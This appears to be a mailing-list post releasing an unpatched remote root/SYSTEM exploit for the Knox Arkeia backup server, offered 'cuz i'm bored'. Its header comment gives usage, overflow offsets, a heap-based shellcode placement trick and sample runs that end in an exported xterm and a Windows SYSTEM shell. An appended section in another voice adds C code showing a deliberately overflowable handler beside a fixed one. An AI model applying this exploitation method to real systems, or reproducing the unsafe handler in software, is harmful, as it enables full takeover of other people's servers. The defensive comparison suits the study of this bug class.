From: guldens111 at hotmail.com (John Doe)
Subject: Knox Arkeia remote root/system exploit

0day cuz i'm bored

/*
* Knox Arkeia Server Backup
* arkeiad local/remote root exploit
* Targets for Redhat 7.2/8.0, Win2k SP2/SP3/SP4, WinXP SP1, Win 2003 EE
* Works up to current version 5.3.x
*
* ---------------
*
* Linux x86:
* ./arksink2 <arkeia_host> <target_type> <display>
*
* Exports an xterm to the box of your choosing.  Make sure to "xhost +" on
* the box you're exporting to.
*
* A stack overflow is in the processing of a type 77 request.  EIP is actually
* overwritten at 64 bytes, but the trailing NULL scrambled a pointer so we
* have to write past EIP and insert a "safe" value.  Put this value behind your
* NOP+sc return address so it doesn't mess with the sled.
*
* Since the buffer is so small, we initially send an invalid packet that ends
* up on the heap a second before the overflow happens.  If it is a high traffic
* Arkeia server the heap might be a bit volatile, so play around with putting
* nops+sc after the overwritten pointer.  The heap method avoids non-exec stack
* protection, however.
*
* Includes targets for RH8 and RH7.2
*
* [user@...t user]$ ./prog 192.168.1.2 1 192.168.1.1:0
* [*] Knox Arkeia <= v5.3.x remote root/SYSTEM exploit
* [*] Attacking LINUX system
* [*] Exporting xterm to 192.168.1.1:0
* [*] Connected to 192.168.1.2:617 NOP+shellcode socket
* [*] Connected to 192.168.1.2:617 overflow socket
* [*] Sending nops+shellcode
* [*] Done, sleeping
* [*] Done, check for xterm
*
*
* ---------------
*
* Windows x86:
* ./prog <host> <target> <offset>
*
* Spawns a shell on port 80 of the remote host
*
* EIP is overwritten beginning with the 25th byte after the header.  Since Windows
* is little endian and has the heap mapped to 0x00XXXXXX we can avoid having to
* write an extra null past EIP.  Another advantage here is that we can put all our
* nops and shellcode in the same packet, but after the NULL.  They will not be copied
* onto the stack (and therefore not munge the pointer after it) but will remain
* in memory as a raw packet.  Fire up ollydbg, search for your nops and voila.
*
* [user@...t user]$ ./arksink2 192.168.1.2 3 0
* [*] Knox Arkeia <= v5.3.x remote SYSTEM exploit
* [*] Attacking Windows system
* [*] Spawning shell on 192.168.1.2:80
* [*] Connected to 192.168.1.2:617 overflow socket
* [*] Sending overflow
* [*] Attempting to get remote shell, try #0
* [!] connect: Resolver Error 0 (no error)
* [*] Attempting to get remote shell, try #1
* [!] connect: Resolver Error 0 (no error)
* [*] Attempting to get remote shell, try #2
* [!] connect: Resolver Error 0 (no error)
* [*] Attempting to get remote shell, try #3
* [!] connect: Resolver Error 0 (no error)
* [*] Attempting to get remote shell, try #4
* [*] Success, enjoy
* Microsoft Windows 2000 [Version 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
*
* C:\WINNT\system32>whoami
* whoami
* SYSTEM
*
* C:\WINNT\system32>
*
*
* ---------------
*
*/

-------------- next part --------------
A non-text attachment was scrubbed...
Name: arksink2.c
Type: text/x-csrc
Size: 12802 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20050218/1dc30ada/arksink2.bin
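The bug class the post describes (a request body copied into a fixed 64-byte stack buffer using a client-supplied length) is modelled below as an added illustration; this is not arkeiad's code, nor the scrubbed arksink2.c, and the two-byte header layout (type byte, length byte) is a constructed assumption, since the post does not give the real Arkeia wire format. The hardened handler rejects any declared length that exceeds either the bytes received or the destination buffer, which is the fix a vendor would ship for this class of flaw.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Constructed wire format for this illustration (not Arkeia's real one):
 * byte 0 = request type, byte 1 = declared body length, bytes 2.. = body. */
#define HDR_LEN       2
#define BODY_BUF_SIZE 64
#define REQ_TYPE_77   77

enum { REQ_OK = 0, REQ_ERR_SHORT = -1, REQ_ERR_TRUNCATED = -2, REQ_ERR_TOO_LONG = -3 };

/* The bug pattern the post describes: the body is copied into a fixed
 * 64-byte stack buffer using the length the client declared, so anything
 * longer runs past the buffer into the saved frame (EIP at 64 bytes).
 * Kept only for comparison; never call it on untrusted input. */
int handle_type77_unsafe(const uint8_t *pkt, size_t pktlen)
{
    uint8_t body[BODY_BUF_SIZE];
    if (pktlen < HDR_LEN || pkt[0] != REQ_TYPE_77) return REQ_ERR_SHORT;
    for (size_t i = 0; i < pkt[1]; i++)     /* no check against sizeof body */
        body[i] = pkt[HDR_LEN + i];
    return REQ_OK;
}

/* Hardened form: the declared length must not exceed the bytes actually
 * received nor the destination buffer; otherwise the request is rejected. */
int handle_type77_safe(const uint8_t *pkt, size_t pktlen)
{
    uint8_t body[BODY_BUF_SIZE];
    if (pktlen < HDR_LEN || pkt[0] != REQ_TYPE_77) return REQ_ERR_SHORT;
    size_t declared = pkt[1];
    if (declared > pktlen - HDR_LEN) return REQ_ERR_TRUNCATED;  /* header lies */
    if (declared > sizeof body) return REQ_ERR_TOO_LONG;         /* would overflow */
    memcpy(body, pkt + HDR_LEN, declared);
    return REQ_OK;
}

/* Demo helper: build a constructed type-77 request carrying body_len filler
 * bytes but advertising declared_len, and return the hardened verdict. */
int verdict_for(size_t body_len, uint8_t declared_len)
{
    uint8_t pkt[300] = { REQ_TYPE_77, declared_len };
    if (body_len > sizeof pkt - HDR_LEN) return REQ_ERR_SHORT;
    memset(pkt + HDR_LEN, 'A', body_len);
    return handle_type77_safe(pkt, HDR_LEN + body_len);
}
```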
